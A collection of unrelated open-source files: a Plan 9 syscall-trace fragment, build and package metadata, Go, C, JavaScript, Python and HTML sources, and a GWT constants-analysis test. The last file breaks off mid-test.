case EXEC:
case SEGBRK:
case SEGATTACH:
case RENDEZVOUS:
if(ar0->v == (void*)-1)
errstr = up->syserrstr;
fmtprint(&fmt, " = %#p", ar0->v);
break;
case RFORK:
if(ar0->v == (void*)-1)
errstr = up->syserrstr;
fmtprint(&fmt, " = %d", ar0->v);
break;
case AWAIT:
if(ar0->i > 0){
fmtuserstring(&fmt, a, " ");
fmtprint(&fmt, "%lu = %d", l, ar0->i);
}
else{
fmtprint(&fmt, "%#p/\"\" %lu = %d", a, l, ar0->i);
errstr = up->syserrstr;
}
break;
case ERRSTR:
fmtuserstring(&fmt, a, " ");
fmtprint(&fmt, "%lu = %d", l, ar0->i);
break;
case FD2PATH:
if(ar0->i > 0){
fmtuserstring(&fmt, a, " ");
fmtprint(&fmt, "%lu = %d", l, ar0->i);
}
else{
fmtprint(&fmt, "\"\" %lu = %d", l, ar0->i);
errstr = up->syserrstr;
}
break;
case PREAD:
if(ar0->l >= 0){
len = MIN(ar0->l, 64);
fmtrwdata(&fmt, v, len, "");
}
else{
fmtprint(&fmt, " %#p/\"\"", v);
errstr = up->syserrstr;
}
fmtprint(&fmt, " %ld 0x%llx = %d", l, vl, ar0->i);
break;
}
fmtprint(&fmt, " %s %#llu %#llu\n", errstr, start, stop);
up->syscalltrace = fmtstrflush(&fmt);
}
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python
import nose
nose.main()
| {
"pile_set_name": "Github"
} |
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("SEA3D_Assimp")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("Microsoft")]
[assembly: AssemblyProduct("SEA3D_Assimp")]
[assembly: AssemblyCopyright("Copyright © Microsoft 2014")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("27f7553b-0b71-4831-bf09-6ee83b801f20")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
| {
"pile_set_name": "Github"
} |
package route53
import (
"net/url"
"regexp"
"github.com/aws/aws-sdk-go/aws/awserr"
"github.com/aws/aws-sdk-go/aws/client"
"github.com/aws/aws-sdk-go/aws/request"
"github.com/aws/aws-sdk-go/private/protocol/restxml"
)
func init() {
initClient = func(c *client.Client) {
c.Handlers.Build.PushBack(sanitizeURL)
}
initRequest = func(r *request.Request) {
switch r.Operation.Name {
case opChangeResourceRecordSets:
r.Handlers.UnmarshalError.Remove(restxml.UnmarshalErrorHandler)
r.Handlers.UnmarshalError.PushBack(unmarshalChangeResourceRecordSetsError)
}
}
}
var reSanitizeURL = regexp.MustCompile(`\/%2F\w+%2F`)
func sanitizeURL(r *request.Request) {
r.HTTPRequest.URL.RawPath =
reSanitizeURL.ReplaceAllString(r.HTTPRequest.URL.RawPath, "/")
// Update Path so that it reflects the cleaned RawPath
updated, err := url.Parse(r.HTTPRequest.URL.RawPath)
if err != nil {
r.Error = awserr.New(request.ErrCodeSerialization, "failed to clean Route53 URL", err)
return
}
// Take the updated path so the requests's URL Path has parity with RawPath.
r.HTTPRequest.URL.Path = updated.Path
}
| {
"pile_set_name": "Github"
} |
<html>
<head>
<script src="incppect.js"></script>
<script src="imgui-ws.js"></script>
</head>
<body style="font-family: Georgia, serif;">
<script>
function init() {
var output = document.getElementById('client-info');
incppect.render = function() {
imgui_ws.gl.clearColor(0.45, 0.55, 0.60, 1.00);
imgui_ws.gl.clear(imgui_ws.gl.COLOR_BUFFER_BIT);
imgui_ws.incppect_tex_font(this);
imgui_ws.incppect_draw_lists(this);
imgui_ws.render();
var my_id = this.get_int32('my_id[%d]', -1) || 0;
output.innerHTML = 'Your client Id: ' + my_id;
}
incppect.onerror = function(evt) {
if (typeof evt === 'object') {
output.innerHTML = 'Error: check console for more information';
console.error(evt);
} else {
output.innerHTML = evt;
}
}
incppect.k_requests_update_freq_ms = document.getElementById('update_freq_ms').value;
incppect.init();
imgui_ws.set_incppect_handlers(incppect);
imgui_ws.init('canvas_main');
}
window.addEventListener('load', init);
</script>
<div id=main-container align=left width=900px style='padding-left: 16px; padding-top: 1px;'>
<h2>imgui-ws : demo-null</h2>
<div style='padding: 3px; width: 800px; word-wrap: break-word;'>
The vertex and index arrays for the Dear ImGui scene below are generated server-side.
The arrays are streamed to the WebSocket clients and rendered in the browser using WebGL.
</div>
<br>
<div style='padding: 3px; width: 800px; word-wrap: break-word;'>
There can be multiple clients connected simultaneously to the same server (see the "WebSocket clients" window below).
Wait for your client to take control and try playing with the widgets.
Your actions will be visible to all currently connected clients.
</div>
<br>
<div id="client-info"></div>
Update freq: <input type="range" min="16" max="200" value="50" class="slider" id="update_freq_ms"
onChange="incppect.k_requests_update_freq_ms = this.value; update_freq_ms_out.value = this.value;">
<output id="update_freq_ms_out">50</output>[ms]<br>
<br>
<canvas id="canvas_main" width="1200px" height="800px" style="background-color: black;" tabindex="0">Your browser does not support the HTML5 canvas tag.</canvas>
<br>
<a href="https://github.com/ggerganov/imgui-ws"><span class="icon icon--github"><svg viewBox="0 0 16 16" width="16px" height="16px"><path fill="#828282" d="M7.999,0.431c-4.285,0-7.76,3.474-7.76,7.761 c0,3.428,2.223,6.337,5.307,7.363c0.388,0.071,0.53-0.168,0.53-0.374c0-0.184-0.007-0.672-0.01-1.32 c-2.159,0.469-2.614-1.04-2.614-1.04c-0.353-0.896-0.862-1.135-0.862-1.135c-0.705-0.481,0.053-0.472,0.053-0.472 c0.779,0.055,1.189,0.8,1.189,0.8c0.692,1.186,1.816,0.843,2.258,0.645c0.071-0.502,0.271-0.843,0.493-1.037 C4.86,11.425,3.049,10.76,3.049,7.786c0-0.847,0.302-1.54,0.799-2.082C3.768,5.507,3.501,4.718,3.924,3.65 c0,0,0.652-0.209,2.134,0.796C6.677,4.273,7.34,4.187,8,4.184c0.659,0.003,1.323,0.089,1.943,0.261 c1.482-1.004,2.132-0.796,2.132-0.796c0.423,1.068,0.157,1.857,0.077,2.054c0.497,0.542,0.798,1.235,0.798,2.082 c0,2.981-1.814,3.637-3.543,3.829c0.279,0.24,0.527,0.713,0.527,1.437c0,1.037-0.01,1.874-0.01,2.129 c0,0.208,0.14,0.449,0.534,0.373c3.081-1.028,5.302-3.935,5.302-7.362C15.76,3.906,12.285,0.431,7.999,0.431z"/></svg>
</span><span class="repo">Source code</span></a>
</div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
const {Renderer, Figure2D, Mesh2D} = meshjs;
const canvas = document.querySelector('canvas');
const renderer = new Renderer(canvas, {
antialias: true,
});
const figure = new Figure2D();
figure.rect(0, 0, 200, 200);
const mesh = new Mesh2D(figure);
mesh.setLinearGradient({
vector: [0, 0, 200, 200],
colors: [
{offset: 0, color: [1, 0, 0, 1]},
{offset: 0.5, color: [0, 1, 0, 1]},
{offset: 1, color: [0, 0, 1, 1]},
],
});
mesh.translate(200, 50);
const figure2 = new Figure2D();
figure2.arc(0, 0, 50, 0, 2 * Math.PI);
const mesh2 = new Mesh2D(figure2);
mesh2.setRadialGradient({
vector: [0, 0, 0, 0, 0, 50],
colors: [
{offset: 0, color: [1, 0, 1, 1]},
{offset: 0.5, color: [0, 1, 1, 1]},
{offset: 1, color: [1, 0, 1, 1]},
],
});
mesh2.translate(300, 150);
renderer.drawMeshes([mesh, mesh2]);
| {
"pile_set_name": "Github"
} |
// Copyright 2015 CoreOS, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package capnslog
import (
"bufio"
"bytes"
"io"
"os"
"runtime"
"strconv"
"strings"
"time"
)
var pid = os.Getpid()
type GlogFormatter struct {
StringFormatter
}
func NewGlogFormatter(w io.Writer) *GlogFormatter {
g := &GlogFormatter{}
g.w = bufio.NewWriter(w)
return g
}
func (g GlogFormatter) Format(pkg string, level LogLevel, depth int, entries ...interface{}) {
g.w.Write(GlogHeader(level, depth+1))
g.StringFormatter.Format(pkg, level, depth+1, entries...)
}
func GlogHeader(level LogLevel, depth int) []byte {
// Lmmdd hh:mm:ss.uuuuuu threadid file:line]
now := time.Now().UTC()
_, file, line, ok := runtime.Caller(depth) // It's always the same number of frames to the user's call.
if !ok {
file = "???"
line = 1
} else {
slash := strings.LastIndex(file, "/")
if slash >= 0 {
file = file[slash+1:]
}
}
if line < 0 {
line = 0 // not a real line number
}
buf := &bytes.Buffer{}
buf.Grow(30)
_, month, day := now.Date()
hour, minute, second := now.Clock()
buf.WriteString(level.Char())
twoDigits(buf, int(month))
twoDigits(buf, day)
buf.WriteByte(' ')
twoDigits(buf, hour)
buf.WriteByte(':')
twoDigits(buf, minute)
buf.WriteByte(':')
twoDigits(buf, second)
buf.WriteByte('.')
buf.WriteString(strconv.Itoa(now.Nanosecond() / 1000))
buf.WriteByte('Z')
buf.WriteByte(' ')
buf.WriteString(strconv.Itoa(pid))
buf.WriteByte(' ')
buf.WriteString(file)
buf.WriteByte(':')
buf.WriteString(strconv.Itoa(line))
buf.WriteByte(']')
buf.WriteByte(' ')
return buf.Bytes()
}
const digits = "0123456789"
func twoDigits(b *bytes.Buffer, d int) {
c2 := digits[d%10]
d /= 10
c1 := digits[d%10]
b.WriteByte(c1)
b.WriteByte(c2)
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_33) on Mon Jul 09 20:50:24 BST 2012 -->
<TITLE>
Uses of Class org.hamcrest.object.IsEventFrom (Hamcrest)
</TITLE>
<META NAME="date" CONTENT="2012-07-09">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class org.hamcrest.object.IsEventFrom (Hamcrest)";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../org/hamcrest/object/IsEventFrom.html" title="class in org.hamcrest.object"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../index.html?org/hamcrest/object/\class-useIsEventFrom.html" target="_top"><B>FRAMES</B></A>
<A HREF="IsEventFrom.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<CENTER>
<H2>
<B>Uses of Class<br>org.hamcrest.object.IsEventFrom</B></H2>
</CENTER>
No usage of org.hamcrest.object.IsEventFrom
<P>
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../org/hamcrest/object/IsEventFrom.html" title="class in org.hamcrest.object"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../index.html?org/hamcrest/object/\class-useIsEventFrom.html" target="_top"><B>FRAMES</B></A>
<A HREF="IsEventFrom.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
</BODY>
</HTML>
| {
"pile_set_name": "Github"
} |
package filtercompanies
import (
"net/http"
"github.com/aerogo/aero"
"github.com/animenotifier/notify.moe/arn"
"github.com/animenotifier/notify.moe/components"
)
const maxEntries = 70
// NoDescription ...
func NoDescription(ctx aero.Context) error {
user := arn.GetUserFromContext(ctx)
if user == nil || (user.Role != "admin" && user.Role != "editor") {
return ctx.Redirect(http.StatusTemporaryRedirect, "/")
}
companies := arn.FilterCompanies(func(company *arn.Company) bool {
return !company.IsDraft && len(company.Description) < 5
})
arn.SortCompaniesPopularFirst(companies)
count := len(companies)
if count > maxEntries {
companies = companies[:maxEntries]
}
return ctx.HTML(components.CompaniesEditorList(companies, count, ctx.Path(), user))
}
| {
"pile_set_name": "Github"
} |
/* SPDX-License-Identifier: GPL-2.0 */
#ifndef _ASM_GENERIC_BITOPS_FLS64_H_
#define _ASM_GENERIC_BITOPS_FLS64_H_
#include <asm/types.h>
/**
* fls64 - find last set bit in a 64-bit word
* @x: the word to search
*
* This is defined in a similar way as the libc and compiler builtin
* ffsll, but returns the position of the most significant set bit.
*
* fls64(value) returns 0 if value is 0 or the position of the last
* set bit if value is nonzero. The last (most significant) bit is
* at position 64.
*/
#if BITS_PER_LONG == 32
static __always_inline int fls64(__u64 x)
{
__u32 h = x >> 32;
if (h)
return fls(h) + 32;
return fls(x);
}
#elif BITS_PER_LONG == 64
static __always_inline int fls64(__u64 x)
{
if (x == 0)
return 0;
return __fls(x) + 1;
}
#else
#error BITS_PER_LONG not 32 or 64
#endif
#endif /* _ASM_GENERIC_BITOPS_FLS64_H_ */
| {
"pile_set_name": "Github"
} |
//
// FullScreenExample.h
// FSCalendar
//
// Created by Wenchao Ding on 9/16/15.
// Copyright (c) 2015 Wenchao Ding. All rights reserved.
//
#import <UIKit/UIKit.h>
@interface FullScreenExampleViewController : UIViewController
@end
| {
"pile_set_name": "Github"
} |
{
"name": "Appboy-iOS-SDK",
"version": "3.3.1",
"summary": "This is the Braze iOS SDK for Mobile Marketing Automation",
"homepage": "http://www.braze.com",
"license": {
"type": "Commercial",
"text": "Please refer to https://github.com/Appboy/appboy-ios-sdk/blob/master/LICENSE"
},
"authors": {
"Appboy": "http://www.braze.com"
},
"source": {
"git": "https://github.com/Appboy/appboy-ios-sdk.git",
"tag": "3.3.1"
},
"platforms": {
"ios": "8.0"
},
"requires_arc": true,
"documentation_url": "http://documentation.braze.com/",
"exclude_files": "AppboyKit/**/*.txt",
"preserve_paths": "AppboyKit/**/*.*",
"pod_target_xcconfig": {
"OTHER_LDFLAGS": "-ObjC"
},
"default_subspecs": "UI",
"subspecs": [
{
"name": "Core",
"ios": {
"libraries": "z"
},
"frameworks": [
"SystemConfiguration",
"QuartzCore",
"CoreText",
"WebKit"
],
"source_files": [
"AppboyKit/headers/AppboyKitLibrary/*.h",
"AppboyKit/ABKIdentifierForAdvertisingProvider.m",
"AppboyKit/ABKModalWebViewController.m",
"AppboyKit/ABKNoConnectionLocalization.m"
],
"vendored_libraries": "AppboyKit/libAppboyKitLibrary.a",
"weak_frameworks": [
"CoreTelephony",
"Social",
"Accounts",
"AdSupport",
"StoreKit",
"UserNotifications"
]
},
{
"name": "UI",
"resources": "AppboyKit/Appboy.bundle",
"dependencies": {
"Appboy-iOS-SDK/Feedback": [
],
"Appboy-iOS-SDK/InAppMessage": [
],
"Appboy-iOS-SDK/Core": [
]
}
},
{
"name": "Feedback",
"source_files": [
"AppboyUI/ABKFeedbackViewController/FeedbackViewController/*.*",
"AppboyUI/ABKFeedbackViewController/AppboyFeedback.h",
"AppboyUI/ABKUIUtils/**/*.*"
],
"resources": "AppboyUI/ABKFeedbackViewController/Feedback_Resources/**/*.*",
"dependencies": {
"Appboy-iOS-SDK/Core": [
]
}
},
{
"name": "InAppMessage",
"source_files": [
"AppboyUI/ABKUIUtils/**/*.*",
"AppboyUI/InAppMessage/*.*",
"AppboyUI/InAppMessage/ViewControllers/*.*",
"AppboyKit/ABKSDWebImageProxy.m"
],
"resources": "AppboyUI/InAppMessage/Resources/*.*",
"dependencies": {
"SDWebImage/GIF": [
"~>4.0"
],
"Appboy-iOS-SDK/Core": [
]
}
}
]
}
| {
"pile_set_name": "Github"
} |
#
# This file is part of CasADi.
#
# CasADi -- A symbolic framework for dynamic optimization.
# Copyright (C) 2010-2014 Joel Andersson, Joris Gillis, Moritz Diehl,
# K.U. Leuven. All rights reserved.
# Copyright (C) 2011-2014 Greg Horn
#
# CasADi is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# CasADi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with CasADi; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
#
from casadi import *
"""
This example mainly intended for CasADi presentations. It contains a compact
implementation of a direct single shooting method for DAEs using a minimal
number of CasADi concepts.
It solves the following optimal control problem (OCP) in differential-algebraic
equations (DAE):
minimize integral_{t=0}^{10} x0^2 + x1^2 + u^2 dt
x0,x1,z,u
subject to dot(x0) == z*x0-x1+u \
dot(x1) == x0 } for 0 <= t <= 10
0 == x1^2 + z - 1 /
x0(t=0) == 0
x1(t=0) == 1
x0(t=10) == 0
x1(t=10) == 0
-0.75 <= u <= 1 for 0 <= t <= 10
Note that other methods such as direct collocation or direct multiple shooting
are usually preferably to the direct single shooting method in practise.
Joel Andersson, 2012-2015
"""
# Declare variables
x = SX.sym("x",2) # Differential states
z = SX.sym("z") # Algebraic variable
u = SX.sym("u") # Control
# Differential equation
f_x = vertcat(z*x[0]-x[1]+u, x[0])
# Algebraic equation
f_z = x[1]**2 + z - 1
# Lagrange cost term (quadrature)
f_q = x[0]**2 + x[1]**2 + u**2
# Create an integrator
dae = {'x':x, 'z':z, 'p':u, 'ode':f_x, 'alg':f_z, 'quad':f_q}
opts = {"tf":0.5} # interval length
I = integrator('I', "idas", dae, opts)
# All controls
U = MX.sym("U", 20)
# Construct graph of integrator calls
X = [0,1]
J = 0
for k in range(20):
Ik = I(x0=X, p=U[k])
X = Ik['xf']
J += Ik['qf'] # Sum up quadratures
# Allocate an NLP solver
nlp = {'x':U, 'f':J, 'g':X}
opts = {"ipopt.linear_solver":"ma27"}
solver = nlpsol("solver", "ipopt", nlp, opts)
# Pass bounds, initial guess and solve NLP
sol = solver(lbx = -0.75, # Lower variable bound
ubx = 1.0, # Upper variable bound
lbg = 0.0, # Lower constraint bound
ubg = 0.0, # Upper constraint bound
x0 = 0.0) # Initial guess
print(sol)
| {
"pile_set_name": "Github"
} |
{
"name": "tinytime",
"version": "0.2.6",
"amdName": "tinytime",
"main": "dist/tinytime.js",
"umd:main": "dist/tinytime.umd.js",
"license": "MIT",
"repository": {
"type": "git",
"url": "https://github.com/aweary/tinytime"
},
"scripts": {
"rollup:cjs": "NODE_ENV=production rollup -c rollup.config.js -m -f cjs -n $npm_package_amdName $npm_package_jsnext_main -o $npm_package_main",
"rollup:umd": "NODE_ENV=production rollup -c rollup.config.js -m -f umd -n $npm_package_amdName $npm_package_jsnext_main -o dist/tinytime.umd.js",
"rollup": "npm run rollup:cjs && npm run rollup:umd",
"minify": "make uglify",
"build": "npm run rollup && npm run minify && gzip-size dist/tinytime.js | pretty-bytes",
"test": "NODE_ENV=test flow && jest",
"prepublish": "npm run build",
"publish": "np",
"version": "conventional-changelog -p angular -i CHANGELOG.md -s -r 0 && git add CHANGELOG.md"
},
"devDependencies": {
"babel-core": "^6.21.0",
"babel-jest": "^18.0.0",
"babel-plugin-syntax-flow": "^6.18.0",
"babel-plugin-transform-flow-strip-types": "^6.21.0",
"babel-preset-es2015": "^6.18.0",
"conventional-changelog-cli": "^1.3.1",
"flow-bin": "^0.38.0",
"gzip-size-cli": "^1.0.0",
"jest": "^18.1.0",
"np": "^2.13.0",
"pretty-bytes-cli": "^2.0.0",
"rollup": "^0.41.4",
"rollup-plugin-babel": "^2.7.1",
"rollup-plugin-flow": "^1.1.1",
"standard-version": "^4.0.0",
"uglify-js": "^2.7.5"
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2008 Google Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.gwt.dev.jjs.impl.gflow.constants;
import com.google.gwt.dev.jjs.impl.gflow.Analysis;
import com.google.gwt.dev.jjs.impl.gflow.CfgAnalysisTestBase;
import com.google.gwt.dev.jjs.impl.gflow.cfg.Cfg;
import com.google.gwt.dev.jjs.impl.gflow.cfg.CfgEdge;
import com.google.gwt.dev.jjs.impl.gflow.cfg.CfgNode;
/**
* Tests for {@link ConstantAnalysis} dataflow analysis.
*/
public class ConstantsAnalysisTest extends CfgAnalysisTestBase<ConstantsAssumption> {
@Override
protected void setUp() throws Exception {
super.setUp();
addSnippetClassDecl("static int i;");
addSnippetClassDecl("static int j;");
addSnippetClassDecl("static int k;");
addSnippetClassDecl("static int l;");
addSnippetClassDecl("static int m;");
addSnippetClassDecl("static int foo() { return 0; };");
addSnippetClassDecl("static void bar(Object o) { };");
addSnippetClassDecl("static int baz(Object o) { return 0; };");
}
public void testDeclWithConstInit() throws Exception {
analyze("void", "int i = 1;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(i, 1) -> [* {i = 1}]",
"END");
}
public void testDeclWithConstOps() throws Exception {
analyze("void", "int i = 1 + 1;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(i, 1 + 1) -> [* {i = 2}]",
"END");
}
public void testDeclWithNonconstInit() throws Exception {
analyze("void", "int i = foo();").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"OPTTHROW(foo()) -> [NOTHROW=* T, RE=1 T, E=1 T]",
"CALL(foo) -> [* T]",
"WRITE(i, EntryPoint.foo()) -> [* T]",
"1: END");
}
public void testReassign() throws Exception {
analyze("void", "int i = 1; i = 2;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(i, 1) -> [* {i = 1}]",
"STMT -> [* {i = 1}]",
"WRITE(i, 2) -> [* {i = 2}]",
"END");
analyze("void", "int i; i = 3;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"STMT -> [* T]",
"WRITE(i, 3) -> [* {i = 3}]",
"END");
}
public void test2Vars() throws Exception {
analyze("void", "int i = 1; int j = 2;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(i, 1) -> [* {i = 1}]",
"STMT -> [* {i = 1}]",
"WRITE(j, 2) -> [* {i = 1, j = 2}]",
"END");
}
public void testSequence() throws Exception {
analyze("void", "int i = 1; int j = i; int k = j; int l = k;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(i, 1) -> [* {i = 1}]",
"STMT -> [* {i = 1}]",
"READ(i) -> [* {i = 1}]",
"WRITE(j, i) -> [* {i = 1, j = 1}]",
"STMT -> [* {i = 1, j = 1}]",
"READ(j) -> [* {i = 1, j = 1}]",
"WRITE(k, j) -> [* {i = 1, j = 1, k = 1}]",
"STMT -> [* {i = 1, j = 1, k = 1}]",
"READ(k) -> [* {i = 1, j = 1, k = 1}]",
"WRITE(l, k) -> [* {i = 1, j = 1, k = 1, l = 1}]",
"END");
}
public void testIfStatement() throws Exception {
analyze("void", "int i = k; if (i == 1) { int j = i; } else { int j = i; } ").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"READ(k) -> [* T]",
"WRITE(i, EntryPoint.k) -> [* T]",
"STMT -> [* T]",
"READ(i) -> [* T]",
"COND (i == 1) -> [THEN=* {i = 1}, ELSE=1 T]",
"BLOCK -> [* {i = 1}]",
"STMT -> [* {i = 1}]",
"READ(i) -> [* {i = 1}]",
"WRITE(j, i) -> [2 {i = 1, j = 1}]",
"1: BLOCK -> [* T]",
"STMT -> [* T]",
"READ(i) -> [* T]",
"WRITE(j, i) -> [* T]",
"2: END");
analyze("int", "int j = 0; if (foo() == 1) j = 1; return j;").into(
"BLOCK -> [* T]",
"STMT -> [* T]",
"WRITE(j, 0) -> [* {j = 0}]",
"STMT -> [* {j = 0}]",
"OPTTHROW(foo()) -> [NOTHROW=* {j = 0}, RE=2 {j = 0}, E=2 {j = 0}]",
"CALL(foo) -> [* {j = 0}]",
"COND (EntryPoint.foo() == 1) -> [THEN=* {j = 0}, ELSE=1 {j = 0}]",
"STMT -> [* {j = 0}]",
